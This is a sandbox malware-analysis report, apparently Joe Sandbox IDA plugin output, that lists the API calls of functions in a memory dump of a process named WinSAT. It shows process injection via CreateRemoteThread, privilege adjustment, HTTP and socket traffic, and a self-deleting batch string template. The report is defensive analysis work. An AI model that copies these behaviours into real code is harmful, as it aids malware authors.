Part of subcall function 01D1DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01D32868,00000000,01D1E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01D1DFBA
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1DFC7
Part of subcall function 01D1DF74: SelectObject.GDI32(00000000,00000000), ref: 01D1DFE1
Part of subcall function 01D1DF74: DeleteObject.GDI32(00000000), ref: 01D1DFF2
Part of subcall function 01D1DF74: DeleteDC.GDI32(00000000), ref: 01D1DFFF
Part of subcall function 01D1DF74: CloseHandle.KERNEL32(00000000), ref: 01D1E010
Part of subcall function 01D1DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D1E01F
Part of subcall function 01D1DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01D1E038

Part of subcall function 01D265B7: recv.WS2_32(?,?,00000400,00000000), ref: 01D26600
Part of subcall function 01D265B7: #19.WS2_32(?,?,00000000,00000000), ref: 01D2661A
Part of subcall function 01D265B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 01D26657

Part of subcall function 01D2675E: shutdown.WS2_32(?,00000002), ref: 01D26766
Part of subcall function 01D2675E: #3.WS2_32(?), ref: 01D2676D

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D267B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01D267CC

Part of subcall function 01D26774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 01D267A7

Part of subcall function 01D26403: socket.WS2_32(?,00000001,00000006), ref: 01D2640C
Part of subcall function 01D26403: connect.WS2_32(00000000,?,-0000001D), ref: 01D2642C
Part of subcall function 01D26403: #3.WS2_32(00000000), ref: 01D26437

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 01D2A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 01D2A5F4

Part of subcall function 01D21049: EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21064
Part of subcall function 01D21049: LeaveCriticalSection.KERNEL32(01D32AC8), ref: 01D210E7
Part of subcall function 01D21049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01D211B2
Part of subcall function 01D21049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01D213EC

SetLastError.KERNEL32(00002F78), ref: 01D2A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 01D2A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A795
EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A79D
LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A853

Part of subcall function 01D25048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 01D2506A
Part of subcall function 01D25048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 01D2508C
Part of subcall function 01D25048: InternetCloseHandle.WININET(?), ref: 01D25094

Part of subcall function 01D21C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 01D21C81
Part of subcall function 01D21C3C: CloseHandle.KERNEL32(?), ref: 01D21C9A

EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A87A
LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A8BA

Part of subcall function 01D29C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,Function_00023F24,01D2A893,?), ref: 01D29CB1

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D231CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01D231ED
Process32FirstW.KERNEL32(000001E6,?), ref: 01D23216

Part of subcall function 01D2245B: CreateMutexW.KERNEL32(01D32C30,00000001,?,01D32E70,76C605D7,?,00000002,?,76C605D7), ref: 01D224A3
Part of subcall function 01D2245B: GetLastError.KERNEL32 ref: 01D224AF
Part of subcall function 01D2245B: CloseHandle.KERNEL32(00000000), ref: 01D224BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01D23271
CloseHandle.KERNEL32(?), ref: 01D2330E

Part of subcall function 01D249D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D249E2
Part of subcall function 01D249D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01D22326,000000FF,01D32C08), ref: 01D24A0E
Part of subcall function 01D249D2: CloseHandle.KERNEL32(?), ref: 01D24A23

CloseHandle.KERNEL32(00000000), ref: 01D2328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01D232A1

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

Part of subcall function 01D23048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 01D23157
Part of subcall function 01D23048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-03A55903,00000000,00000000,00000000), ref: 01D23185
Part of subcall function 01D23048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 01D23198
Part of subcall function 01D23048: CloseHandle.KERNEL32(?), ref: 01D231A1
Part of subcall function 01D23048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 01D231B5
Part of subcall function 01D23048: CloseHandle.KERNEL32(00000000), ref: 01D231BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 01D2331A
CloseHandle.KERNEL32(000001E6), ref: 01D2332B

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D1B130
ReleaseMutex.KERNEL32(?), ref: 01D1B14F
GetWindowRect.USER32(?,?), ref: 01D1B15C
IsRectEmpty.USER32(?), ref: 01D1B1E0
GetWindowLongW.USER32(?,000000F0), ref: 01D1B1EF
GetParent.USER32(?), ref: 01D1B205
MapWindowPoints.USER32(00000000,00000000), ref: 01D1B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 01D1B232

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D214C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 01D2433F: CharLowerA.USER32(00000000), ref: 01D24420
Part of subcall function 01D2433F: CharLowerA.USER32(?), ref: 01D2442D

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

Part of subcall function 01D27FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 01D28104

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

InternetCrackUrlA.WININET ref: 01D217AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01D217CA

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

LeaveCriticalSection.KERNEL32(01D32AC8,?,?), ref: 01D2194D

Part of subcall function 01D24660: CryptAcquireContextW.ADVAPI32(01D28C87,00000000,00000000,00000001,F0000040,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24679
Part of subcall function 01D24660: CryptCreateHash.ADVAPI32(01D28C87,00008003,00000000,00000000,00000030,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24691
Part of subcall function 01D24660: CryptHashData.ADVAPI32(00000030,00000010,01D28C87,00000000,?,01D28C87), ref: 01D246AD
Part of subcall function 01D24660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01D28C87), ref: 01D246C5
Part of subcall function 01D24660: CryptDestroyHash.ADVAPI32(00000030,?,01D28C87), ref: 01D246DC
Part of subcall function 01D24660: CryptReleaseContext.ADVAPI32(01D28C87,00000000,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D246E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01D218E4

Part of subcall function 01D2763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01D29EAB,?,?,00000004), ref: 01D27658
Part of subcall function 01D2763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01D29EAB,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27672
Part of subcall function 01D2763A: RegCloseKey.ADVAPI32(00000004,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27681

EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21910

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

?*, xrefs: 01D214FD

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D163F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

Part of subcall function 01D15ECF: PathRemoveFileSpecW.SHLWAPI(01D325D0), ref: 01D15F07
Part of subcall function 01D15ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 01D15F23
Part of subcall function 01D15ECF: GetFileAttributesW.KERNEL32(01D323C8,01D325D0,01D325D0,00000000,00020000,01D169C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 01D15F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 01D16538
GetFileAttributesW.KERNEL32(01D323C8), ref: 01D1654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01D16571
CloseHandle.KERNEL32(00000000), ref: 01D1658F
lstrcmpiW.KERNEL32(?,?), ref: 01D165BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 01D165E7

Part of subcall function 01D16BD7: RegOpenKeyExW.ADVAPI32(80000001,01D327F0,00000000,00000001,?,?), ref: 01D16C00

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D16010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 01D1610F
Part of subcall function 01D16010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 01D16162
Part of subcall function 01D16010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 01D161A4
Part of subcall function 01D16010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 01D161E6

Part of subcall function 01D1680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 01D1685A
Part of subcall function 01D1680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 01D16869

Part of subcall function 01D29354: FlushFileBuffers.KERNEL32(00000000), ref: 01D29360
Part of subcall function 01D29354: CloseHandle.KERNEL32(?), ref: 01D29368

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

Part of subcall function 01D286EF: GetFileSizeEx.KERNEL32(01D2925C,01D2925C,?,?,?,01D2925C,00000000), ref: 01D286FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 01D1668B

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D28AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A

Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A298, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 01D2A2A6

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

InternetSetStatusCallbackW.WININET(?,01D2A24F), ref: 01D2A2DB
InternetReadFileExA.WININET ref: 01D2A31B
GetLastError.KERNEL32 ref: 01D2A325

Part of subcall function 01D26B28: TranslateMessage.USER32(?), ref: 01D26B4A
Part of subcall function 01D26B28: DispatchMessageW.USER32(?), ref: 01D26B55
Part of subcall function 01D26B28: PeekMessageW.USER32(00000000), ref: 01D26B65
Part of subcall function 01D26B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 01D26B79

InternetSetStatusCallbackW.WININET(?,?), ref: 01D2A389

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

Strings

Zqdq2qnq<qFq, xrefs: 01D2A31B

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 01D28737: GetTempPathW.KERNEL32(000000F6,?), ref: 01D2874E

CharToOemW.USER32(?,?), ref: 01D24EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 01D24F2F

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

Part of subcall function 01D2856B: CreateFileW.KERNEL32(01D24E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D28585
Part of subcall function 01D2856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01D285A8
Part of subcall function 01D2856B: CloseHandle.KERNEL32(00000000), ref: 01D285B5

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Strings

ComSpec, xrefs: 01D24F2A
bat, xrefs: 01D24E8B
@echo off%sdel /F "%s", xrefs: 01D24EBE
/c "%s", xrefs: 01D24F01

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 01D2797D
PathAddBackslashW.SHLWAPI(?), ref: 01D27994
PathRemoveBackslashW.SHLWAPI(?), ref: 01D279A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 01D279B2
PathAddBackslashW.SHLWAPI(?), ref: 01D279C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 01D279D2
CLSIDFromString.OLE32(?,?), ref: 01D279EC

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D278D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 01D278FD

Part of subcall function 01D2773A: CharUpperW.USER32(00000000), ref: 01D2785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 01D2792F
RegCloseKey.ADVAPI32(?), ref: 01D27938
RegCloseKey.ADVAPI32(?), ref: 01D27952

Strings

SOFTWARE\Microsoft, xrefs: 01D278F0
d, xrefs: 01D27943

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,01D2C9A1,00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,01D2C9A1,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24AB0
LookupPrivilegeValueW.ADVAPI32(00000000,01D2C9A1,?), ref: 01D24AD4
AdjustTokenPrivileges.ADVAPI32(01D2C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01D24AE9
GetLastError.KERNEL32 ref: 01D24AF3
CloseHandle.KERNEL32(01D2C9A1), ref: 01D24B02

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D26A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 01D24A87: GetCurrentThread.KERNEL32(00000020,00000000,01D2C9A1,00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A97
Part of subcall function 01D24A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24A9E
Part of subcall function 01D24A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01D2C9A1,?,?,?,?,01D2C9A1,SeTcbPrivilege), ref: 01D24AB0
Part of subcall function 01D24A87: LookupPrivilegeValueW.ADVAPI32(00000000,01D2C9A1,?), ref: 01D24AD4
Part of subcall function 01D24A87: AdjustTokenPrivileges.ADVAPI32(01D2C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01D24AE9
Part of subcall function 01D24A87: GetLastError.KERNEL32 ref: 01D24AF3
Part of subcall function 01D24A87: CloseHandle.KERNEL32(01D2C9A1), ref: 01D24B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01D26A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 01D26A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 01D26A8E
LocalFree.KERNEL32(00000000), ref: 01D26A9D

Strings

SeSecurityPrivilege, xrefs: 01D26A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 01D26A56

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 01D1B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 01D1B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 01D1B3B2

Part of subcall function 01D1B23D: GetTickCount.KERNEL32 ref: 01D1B2A3
Part of subcall function 01D1B23D: GetClassLongW.USER32(?,000000E6), ref: 01D1B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 01D1B448
PostMessageW.USER32(?,00000112,?,?), ref: 01D1B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 01D1B4DA

Part of subcall function 01D1B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D1B0B3
Part of subcall function 01D1B0AD: ReleaseMutex.KERNEL32(?), ref: 01D1B0E7
Part of subcall function 01D1B0AD: IsWindow.USER32(?), ref: 01D1B0EE
Part of subcall function 01D1B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 01D1B108
Part of subcall function 01D1B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 01D1B110

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D19694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01D19709
StrStrIW.SHLWAPI(?,?), ref: 01D19796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D197BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 01D197DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01D1980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D1982D

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A3C2
LeaveCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A425

Part of subcall function 01D2A298: ResetEvent.KERNEL32(?), ref: 01D2A2A6
Part of subcall function 01D2A298: InternetSetStatusCallbackW.WININET(?,01D2A24F), ref: 01D2A2DB
Part of subcall function 01D2A298: InternetReadFileExA.WININET ref: 01D2A31B
Part of subcall function 01D2A298: GetLastError.KERNEL32 ref: 01D2A325
Part of subcall function 01D2A298: InternetSetStatusCallbackW.WININET(?,?), ref: 01D2A389

EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 01D2A4C6

Part of subcall function 01D2856B: CreateFileW.KERNEL32(01D24E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D28585
Part of subcall function 01D2856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01D285A8
Part of subcall function 01D2856B: CloseHandle.KERNEL32(00000000), ref: 01D285B5

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D25505
Part of subcall function 01D254F1: GetLastError.KERNEL32 ref: 01D2550F
Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D2552F

Part of subcall function 01D214C3: InternetCrackUrlA.WININET ref: 01D217AC
Part of subcall function 01D214C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01D217CA
Part of subcall function 01D214C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01D218E4
Part of subcall function 01D214C3: EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21910
Part of subcall function 01D214C3: LeaveCriticalSection.KERNEL32(01D32AC8,?,?), ref: 01D2194D

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

SetLastError.KERNEL32(00002EE4), ref: 01D2A51C
LeaveCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A585

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01D192D4
StrStrIW.SHLWAPI(?,?), ref: 01D1935C
StrStrIW.SHLWAPI(?,?), ref: 01D1936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D19389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01D193A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01D193C1

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D21049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(01D32AC8), ref: 01D21064
LeaveCriticalSection.KERNEL32(01D32AC8), ref: 01D210E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01D211B2

Part of subcall function 01D2AE54: EnterCriticalSection.KERNEL32(01D33FB4,?,01D211CF,?), ref: 01D2AE5B
Part of subcall function 01D2AE54: LeaveCriticalSection.KERNEL32(01D33FB4), ref: 01D2AE90

Part of subcall function 01D2AE9A: EnterCriticalSection.KERNEL32(01D33FB4,?,00000000,01D213AE,00000000), ref: 01D2AEA6
Part of subcall function 01D2AE9A: LeaveCriticalSection.KERNEL32(01D33FB4), ref: 01D2AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01D213EC

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D20AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20C73
